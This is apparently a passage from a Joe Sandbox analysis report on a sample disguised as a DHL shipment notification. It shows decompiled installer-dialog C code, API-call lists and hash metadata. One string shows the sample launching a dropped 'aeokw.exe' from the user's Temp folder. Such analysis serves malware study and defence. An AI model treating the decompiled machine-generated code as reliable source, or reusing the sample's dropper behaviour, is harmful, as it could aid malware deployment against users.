                        								}
                        								if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != _t158) {
                        									E00404F40(0x3ff, 0xfffffffb, _t95);
                        									if(_v12 == _t158) {
                        										SetDlgItemTextW(_a4, _t169, 0x79ff48);
                        									} else {
                        										E00404E77(_t169, 0xfffffffc, _v48, _v44);
                        									}
                        								}
                        								_t96 = _v8;
                        								 *0x7a8b44 = _t96;
                        								if(_t96 == _t158) {
                        									_v8 = E0040140B(7);
                        								}
                        								if(( *(_v32 + 0x14) & _t169) != 0) {
                        									_v8 = _t158;
                        								}
                        								E004045EC(0 | _v8 == _t158);
                        								if(_v8 == _t158 &&  *0x7a1f78 == _t158) {
                        									E00404A14();
                        								}
                        								 *0x7a1f78 = _t158;
                        								goto L53;
                        							}
                        						}
                        						_t186 = _a8 - 0x405;
                        						if(_a8 != 0x405) {
                        							goto L53;
                        						}
                        						goto L22;
                        					}
                        					_t118 = _a12 & 0x0000ffff;
                        					if(_t118 != 0x3fb) {
                        						L12:
                        						if(_t118 == 0x3e9) {
                        							_t152 = 7;
                        							memset( &_v76, 0, _t152 << 2);
                        							_v80 = _t167;
                        							_v72 = 0x7a1f88;
                        							_v60 = E00404E11;
                        							_v56 = _t146;
                        							_v68 = E004066AB(_t146, 0x7a1f88, _t167, 0x7a0760, _v12);
                        							_t122 =  &_v80;
                        							_v64 = 0x41;
                        							__imp__SHBrowseForFolderW(_t122);
                        							if(_t122 == 0) {
                        								_a8 = 0x40f;
                        							} else {
                        								__imp__CoTaskMemFree(_t122);
                        								E00405F3D(_t146);
                        								_t125 =  *((intOrPtr*)( *0x7a8ab0 + 0x11c));
                        								if( *((intOrPtr*)( *0x7a8ab0 + 0x11c)) != 0 && _t146 == L"C:\\Users\\jones\\AppData\\Local\\Temp") {
                        									E004066AB(_t146, 0x7a1f88, _t167, 0, _t125);
                        									if(lstrcmpiW(0x7a6a40, 0x7a1f88) != 0) {
                        										lstrcatW(_t146, 0x7a6a40);
                        									}
                        								}
                        								 *0x7a1f78 =  *0x7a1f78 + 1;
                        								SetDlgItemTextW(_t167, 0x3fb, _t146);
                        							}
                        						}
                        						goto L20;
                        					}
                        					if(_a12 >> 0x10 != 0x300) {
                        						goto L53;
                        					}
                        					_a8 = 0x40f;
                        					goto L12;
                        				} else {
                        					_t166 = GetDlgItem(_t167, 0x3fb);
                        					if(E00405FB4(_t146) != 0 && E00405FE8(_t146) == 0) {
                        						E00405F3D(_t146);
                        					}
                        					 *0x7a7a78 = _t167;
                        					SetWindowTextW(_t166, _t146);
                        					_push( *((intOrPtr*)(_a16 + 0x34)));
                        					_push(1);
                        					E004045CA(_t167);
                        					_push( *((intOrPtr*)(_a16 + 0x30)));
                        					_push(0x14);
                        					E004045CA(_t167);
                        					E004045FF(_t166);
                        					_t138 = E00406A3B(8);
                        					if(_t138 == 0) {
                        						L53:
                        						return E00404631(_a8, _a12, _a16);
                        					} else {
                        						 *_t138(_t166, 1);
                        						goto L8;
                        					}
                        				}
                        			}


                        APIs
                        • GetDlgItem.USER32 ref: 00404B0A
                        • SetWindowTextW.USER32(00000000,?), ref: 00404B34
                        • SHBrowseForFolderW.SHELL32(?), ref: 00404BE5
                        • CoTaskMemFree.OLE32(00000000), ref: 00404BF0
                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,007A1F88,00000000,?,?), ref: 00404C22
                        • lstrcatW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok), ref: 00404C2E
                        • SetDlgItemTextW.USER32 ref: 00404C40
                          • Part of subcall function 00405CB2: GetDlgItemTextW.USER32(?,?,00000400,00404C77), ref: 00405CC5
                          • Part of subcall function 004068F5: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406958
                          • Part of subcall function 004068F5: CharNextW.USER32(?,?,?,00000000,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406967
                          • Part of subcall function 004068F5: CharNextW.USER32(?,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040696C
                          • Part of subcall function 004068F5: CharPrevW.USER32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040697F
                        • GetDiskFreeSpaceW.KERNEL32(0079FF58,?,?,0000040F,?,0079FF58,0079FF58,?,00000001,0079FF58,?,?,000003FB,?), ref: 00404D03
                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D1E
                          • Part of subcall function 00404E77: lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
                          • Part of subcall function 00404E77: wsprintfW.USER32 ref: 00404F21
                          • Part of subcall function 00404E77: SetDlgItemTextW.USER32 ref: 00404F34
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                        • String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
                        • API String ID: 2624150263-253651335
                        • Opcode ID: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
                        • Instruction ID: 4ef08ca0e285fb36132dd1072a135484aded6f5102cec428142970bb06395e88
                        • Opcode Fuzzy Hash: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
                        • Instruction Fuzzy Hash: 77A182B1901209ABEB11AFA5CD45AEF77B9EF84314F11803BF601B62D1DB7C89418B69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 67%
                        			E004021AA() {
                        				signed int _t52;
                        				void* _t56;
                        				intOrPtr* _t60;
                        				intOrPtr _t61;
                        				intOrPtr* _t62;
                        				intOrPtr* _t64;
                        				intOrPtr* _t66;
                        				intOrPtr* _t68;
                        				intOrPtr* _t70;
                        				intOrPtr* _t72;
                        				intOrPtr* _t74;
                        				intOrPtr* _t76;
                        				intOrPtr* _t78;
                        				intOrPtr* _t80;
                        				void* _t83;
                        				intOrPtr* _t91;
                        				signed int _t101;
                        				signed int _t105;
                        				void* _t107;
                        
                        				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                        				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                        				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                        				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                        				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                        				_t52 =  *(_t107 - 0x20);
                        				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                        				_t101 = _t52 & 0x00008000;
                        				_t105 = _t52 >> 0x0000000c & 0x00000007;
                        				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                        				if(E00405FB4( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                        					E00402DA6(0x21);
                        				}
                        				_t56 = _t107 + 8;
                        				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                        				if(_t56 < _t83) {
                        					L14:
                        					 *((intOrPtr*)(_t107 - 4)) = 1;
                        					_push(0xfffffff0);
                        				} else {
                        					_t60 =  *((intOrPtr*)(_t107 + 8));
                        					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                        					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                        					if(_t61 >= _t83) {
                        						_t64 =  *((intOrPtr*)(_t107 + 8));
                        						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                        						if(_t101 == _t83) {
                        							_t80 =  *((intOrPtr*)(_t107 + 8));
                        							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\jones\\AppData\\Local\\Temp");
                        						}
                        						if(_t105 != _t83) {
                        							_t78 =  *((intOrPtr*)(_t107 + 8));
                        							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                        						}
                        						_t66 =  *((intOrPtr*)(_t107 + 8));
                        						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                        						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                        						if( *_t91 != _t83) {
                        							_t76 =  *((intOrPtr*)(_t107 + 8));
                        							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                        						}
                        						_t68 =  *((intOrPtr*)(_t107 + 8));
                        						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                        						_t70 =  *((intOrPtr*)(_t107 + 8));
                        						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                        						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                        							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                        							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                        						}
                        						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                        						 *((intOrPtr*)( *_t72 + 8))(_t72);
                        					}
                        					_t62 =  *((intOrPtr*)(_t107 + 8));
                        					 *((intOrPtr*)( *_t62 + 8))(_t62);
                        					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                        						_push(0xfffffff4);
                        					} else {
                        						goto L14;
                        					}
                        				}
                        				E00401423();
                        				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t107 - 4));
                        				return 0;
                        			}


                        APIs
                        • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                        Strings
                        • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: CreateInstance
                        • String ID: C:\Users\user\AppData\Local\Temp
                        • API String ID: 542301482-47812868
                        • Opcode ID: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
                        • Instruction ID: c9e7058f2ccac2017f9d88f2873359e197591af4de9cbf84fabb751e216ccc72
                        • Opcode Fuzzy Hash: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
                        • Instruction Fuzzy Hash: A1411571A00209EFCF40DFE4C989E9D7BB5BF49304B2045AAF505EB2D1DB799981CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 39%
                        			E0040290B(short __ebx, short* __edi) {
                        				void* _t21;
                        
                        				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                        					E004065B5( *((intOrPtr*)(_t21 - 0xc)), _t8);
                        					_push(_t21 - 0x2b0);
                        					_push(__edi);
                        					E0040666E();
                        				} else {
                        					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                        					 *__edi = __ebx;
                        					 *((intOrPtr*)(_t21 - 4)) = 1;
                        				}
                        				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t21 - 4));
                        				return 0;
                        			}


                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: FileFindFirst
                        • String ID:
                        • API String ID: 1974802433-0
                        • Opcode ID: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
                        • Instruction ID: 9ced82c77f1422a0303d0e50afa4302c42ae01a582b6fde34da312f05d76664a
                        • Opcode Fuzzy Hash: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
                        • Instruction Fuzzy Hash: 5CF05E71904104EAD701DBA4E949AAEB378EF15314F20457BE101F21D0EBB88E119B29
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 96%
                        			E00405037(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                        				struct HWND__* _v8;
                        				struct HWND__* _v12;
                        				long _v16;
                        				signed int _v20;
                        				signed int _v24;
                        				intOrPtr _v28;
                        				signed char* _v32;
                        				int _v36;
                        				signed int _v44;
                        				int _v48;
                        				signed int* _v60;
                        				signed char* _v64;
                        				signed int _v68;
                        				long _v72;
                        				void* _v76;
                        				intOrPtr _v80;
                        				intOrPtr _v84;
                        				void* _v88;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t198;
                        				intOrPtr _t201;
                        				long _t207;
                        				signed int _t211;
                        				signed int _t222;
                        				void* _t225;
                        				void* _t226;
                        				int _t232;
                        				long _t237;
                        				long _t238;
                        				signed int _t239;
                        				signed int _t245;
                        				signed int _t247;
                        				signed char _t248;
                        				signed char _t254;
                        				void* _t258;
                        				void* _t260;
                        				signed char* _t278;
                        				signed char _t279;
                        				long _t284;
                        				struct HWND__* _t291;
                        				signed int* _t292;
                        				int _t293;
                        				long _t294;
                        				signed int _t295;
                        				void* _t297;
                        				long _t298;
                        				int _t299;
                        				signed int _t300;
                        				signed int _t303;
                        				signed int _t311;
                        				signed char* _t319;
                        				int _t324;
                        				void* _t326;
                        
                        				_t291 = _a4;
                        				_v12 = GetDlgItem(_t291, 0x3f9);
                        				_v8 = GetDlgItem(_t291, 0x408);
                        				_t326 = SendMessageW;
                        				_v24 =  *0x7a8ac8;
                        				_v28 =  *0x7a8ab0 + 0x94;
                        				if(_a8 != 0x110) {
                        					L23:
                        					if(_a8 != 0x405) {
                        						_t301 = _a16;
                        					} else {
                        						_a12 = 0;
                        						_t301 = 1;
                        						_a8 = 0x40f;
                        						_a16 = 1;
                        					}
                        					if(_a8 == 0x4e || _a8 == 0x413) {
                        						_v16 = _t301;
                        						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                        							if(( *0x7a8ab9 & 0x00000002) != 0) {
                        								L41:
                        								if(_v16 != 0) {
                        									_t237 = _v16;
                        									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                        										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                        									}
                        									_t238 = _v16;
                        									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                        										_t301 = _v24;
                        										_t239 =  *(_t238 + 0x5c);
                        										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                        											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                        										} else {
                        											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                        										}
                        									}
                        								}
                        								goto L48;
                        							}
                        							if(_a8 == 0x413) {
                        								L33:
                        								_t301 = 0 | _a8 != 0x00000413;
                        								_t245 = E00404F85(_v8, _a8 != 0x413);
                        								_t295 = _t245;
                        								if(_t295 >= 0) {
                        									_t94 = _v24 + 8; // 0x8
                        									_t301 = _t245 * 0x818 + _t94;
                        									_t247 =  *_t301;
                        									if((_t247 & 0x00000010) == 0) {
                        										if((_t247 & 0x00000040) == 0) {
                        											_t248 = _t247 ^ 0x00000001;
                        										} else {
                        											_t254 = _t247 ^ 0x00000080;
                        											if(_t254 >= 0) {
                        												_t248 = _t254 & 0x000000fe;
                        											} else {
                        												_t248 = _t254 | 0x00000001;
                        											}
                        										}
                        										 *_t301 = _t248;
                        										E0040117D(_t295);
                        										_a12 = _t295 + 1;
                        										_a16 =  !( *0x7a8ab8) >> 0x00000008 & 0x00000001;
                        										_a8 = 0x40f;
                        									}
                        								}
                        								goto L41;
                        							}
                        							_t301 = _a16;
                        							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                        								goto L41;
                        							}
                        							goto L33;
                        						} else {
                        							goto L48;
                        						}
                        					} else {
                        						L48:
                        						if(_a8 != 0x111) {
                        							L56:
                        							if(_a8 == 0x200) {
                        								SendMessageW(_v8, 0x200, 0, 0);
                        							}
                        							if(_a8 == 0x40b) {
                        								_t225 =  *0x7a1f6c;
                        								if(_t225 != 0) {
                        									ImageList_Destroy(_t225);
                        								}
                        								_t226 =  *0x7a1f80;
                        								if(_t226 != 0) {
                        									GlobalFree(_t226);
                        								}
                        								 *0x7a1f6c = 0;
                        								 *0x7a1f80 = 0;
                        								 *0x7a8b00 = 0;
                        							}
                        							if(_a8 != 0x40f) {
                        								L90:
                        								if(_a8 == 0x420 && ( *0x7a8ab9 & 0x00000001) != 0) {
                        									_t324 = (0 | _a16 == 0x00000020) << 3;
                        									ShowWindow(_v8, _t324);
                        									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                        								}
                        								goto L93;
                        							} else {
                        								E004011EF(_t301, 0, 0);
                        								_t198 = _a12;
                        								if(_t198 != 0) {
                        									if(_t198 != 0xffffffff) {
                        										_t198 = _t198 - 1;
                        									}
                        									_push(_t198);
                        									_push(8);
                        									E00405005();
                        								}
                        								if(_a16 == 0) {
                        									L75:
                        									E004011EF(_t301, 0, 0);
                        									_v36 =  *0x7a1f80;
                        									_t201 =  *0x7a8ac8;
                        									_v64 = 0xf030;
                        									_v24 = 0;
                        									if( *0x7a8acc <= 0) {
                        										L86:
                        										if( *0x7a8b5e == 0x400) {
                        											InvalidateRect(_v8, 0, 1);
                        										}
                        										if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != 0) {
                        											E00404F40(0x3ff, 0xfffffffb, E00404F58(5));
                        										}
                        										goto L90;
                        									}
                        									_t292 = _t201 + 8;
                        									do {
                        										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                        										if(_t207 != 0) {
                        											_t303 =  *_t292;
                        											_v72 = _t207;
                        											_v76 = 8;
                        											if((_t303 & 0x00000001) != 0) {
                        												_v76 = 9;
                        												_v60 =  &(_t292[4]);
                        												_t292[0] = _t292[0] & 0x000000fe;
                        											}
                        											if((_t303 & 0x00000040) == 0) {
                        												_t211 = (_t303 & 0x00000001) + 1;
                        												if((_t303 & 0x00000010) != 0) {
                        													_t211 = _t211 + 3;
                        												}
                        											} else {
                        												_t211 = 3;
                        											}
                        											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                        											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                        											SendMessageW(_v8, 0x113f, 0,  &_v76);
                        										}
                        										_v24 = _v24 + 1;
                        										_t292 =  &(_t292[0x206]);
                        									} while (_v24 <  *0x7a8acc);
                        									goto L86;
                        								} else {
                        									_t293 = E004012E2( *0x7a1f80);
                        									E00401299(_t293);
                        									_t222 = 0;
                        									_t301 = 0;
                        									if(_t293 <= 0) {
                        										L74:
                        										SendMessageW(_v12, 0x14e, _t301, 0);
                        										_a16 = _t293;
                        										_a8 = 0x420;
                        										goto L75;
                        									} else {
                        										goto L71;
                        									}
                        									do {
                        										L71:
                        										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                        											_t301 = _t301 + 1;
                        										}
                        										_t222 = _t222 + 1;
                        									} while (_t222 < _t293);
                        									goto L74;
                        								}
                        							}
                        						}
                        						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                        							goto L93;
                        						} else {
                        							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                        							if(_t232 == 0xffffffff) {
                        								goto L93;
                        							}
                        							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                        							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                        								_t294 = 0x20;
                        							}
                        							E00401299(_t294);
                        							SendMessageW(_a4, 0x420, 0, _t294);
                        							_a12 = _a12 | 0xffffffff;
                        							_a16 = 0;
                        							_a8 = 0x40f;
                        							goto L56;
                        						}
                        					}
                        				} else {
                        					_v36 = 0;
                        					_v20 = 2;
                        					 *0x7a8b00 = _t291;
                        					 *0x7a1f80 = GlobalAlloc(0x40,  *0x7a8acc << 2);
                        					_t258 = LoadImageW( *0x7a8aa0, 0x6e, 0, 0, 0, 0);
                        					 *0x7a1f74 =  *0x7a1f74 | 0xffffffff;
                        					_t297 = _t258;
                        					 *0x7a1f7c = SetWindowLongW(_v8, 0xfffffffc, E00405644);
                        					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                        					 *0x7a1f6c = _t260;
                        					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                        					SendMessageW(_v8, 0x1109, 2,  *0x7a1f6c);
                        					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                        						SendMessageW(_v8, 0x111b, 0x10, 0);
                        					}
                        					DeleteObject(_t297);
                        					_t298 = 0;
                        					do {
                        						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                        						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                        							if(_t298 != 0x20) {
                        								_v20 = 0;
                        							}
                        							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066AB(_t298, 0, _t326, 0, _t266)), _t298);
                        						}
                        						_t298 = _t298 + 1;
                        					} while (_t298 < 0x21);
                        					_t299 = _a16;
                        					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                        					_push(0x15);
                        					E004045CA(_a4);
                        					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                        					_push(0x16);
                        					E004045CA(_a4);
                        					_t300 = 0;
                        					_v16 = 0;
                        					if( *0x7a8acc <= 0) {
                        						L19:
                        						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                        						goto L20;
                        					} else {
                        						_t319 = _v24 + 8;
                        						_v32 = _t319;
                        						do {
                        							_t278 =  &(_t319[0x10]);
                        							if( *_t278 != 0) {
                        								_v64 = _t278;
                        								_t279 =  *_t319;
                        								_v88 = _v16;
                        								_t311 = 0x20;
                        								_v84 = 0xffff0002;
                        								_v80 = 0xd;
                        								_v68 = _t311;
                        								_v44 = _t300;
                        								_v72 = _t279 & _t311;
                        								if((_t279 & 0x00000002) == 0) {
                        									if((_t279 & 0x00000004) == 0) {
                        										 *( *0x7a1f80 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                        									} else {
                        										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                        									}
                        								} else {
                        									_v80 = 0x4d;
                        									_v48 = 1;
                        									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                        									_v36 = 1;
                        									 *( *0x7a1f80 + _t300 * 4) = _t284;
                        									_v16 =  *( *0x7a1f80 + _t300 * 4);
                        								}
                        							}
                        							_t300 = _t300 + 1;
                        							_t319 =  &(_v32[0x818]);
                        							_v32 = _t319;
                        						} while (_t300 <  *0x7a8acc);
                        						if(_v36 != 0) {
                        							L20:
                        							if(_v20 != 0) {
                        								E004045FF(_v8);
                        								goto L23;
                        							} else {
                        								ShowWindow(_v12, 5);
                        								E004045FF(_v12);
                        								L93:
                        								return E00404631(_a8, _a12, _a16);
                        							}
                        						}
                        						goto L19;
                        					}
                        				}
                        			}


                        APIs
                        • GetDlgItem.USER32 ref: 0040504F
                        • GetDlgItem.USER32 ref: 0040505A
                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004050A4
                        • LoadImageW.USER32 ref: 004050BB
                        • SetWindowLongW.USER32(?,000000FC,00405644), ref: 004050D4
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E8
                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050FA
                        • SendMessageW.USER32(?,00001109,00000002), ref: 00405110
                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 0040511C
                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040512E
                        • DeleteObject.GDI32(00000000), ref: 00405131
                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040515C
                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405168
                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405203
                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405233
                          • Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D
                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405247
                        • GetWindowLongW.USER32(?,000000F0), ref: 00405275
                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405283
                        • ShowWindow.USER32(?,00000005), ref: 00405293
                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040538E
                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053F3
                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405408
                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040542C
                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040544C
                        • ImageList_Destroy.COMCTL32(?), ref: 00405461
                        • GlobalFree.KERNEL32 ref: 00405471
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054EA
                        • SendMessageW.USER32(?,00001102,?,?), ref: 00405593
                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055A2
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004055CD
                        • ShowWindow.USER32(?,00000000), ref: 0040561B
                        • GetDlgItem.USER32 ref: 00405626
                        • ShowWindow.USER32(00000000), ref: 0040562D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                        • String ID: $M$N
                        • API String ID: 2564846305-813528018
                        • Opcode ID: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
                        • Instruction ID: 1c888212402988323542b136e78769e30209d338b2ecbb40b03ff66d659fa363
                        • Opcode Fuzzy Hash: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
                        • Instruction Fuzzy Hash: 25027A70900609EFDB20DFA5CD85AAF7BB5FB85314F10812AF611BA2E1DB798951CF18
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E00404789(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                        				char _v8;
                        				int _v12;
                        				void* _v16;
                        				struct HWND__* _t56;
                        				signed int _t75;
                        				signed short* _t76;
                        				signed short* _t78;
                        				long _t92;
                        				int _t103;
                        				signed int _t110;
                        				intOrPtr _t113;
                        				WCHAR* _t114;
                        				signed int* _t116;
                        				WCHAR* _t117;
                        				struct HWND__* _t118;
                        
                        				if(_a8 != 0x110) {
                        					if(_a8 != 0x111) {
                        						L13:
                        						if(_a8 != 0x4e) {
                        							if(_a8 == 0x40b) {
                        								 *0x79ff54 =  *0x79ff54 + 1;
                        							}
                        							L27:
                        							_t114 = _a16;
                        							L28:
                        							return E00404631(_a8, _a12, _t114);
                        						}
                        						_t56 = GetDlgItem(_a4, 0x3e8);
                        						_t114 = _a16;
                        						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
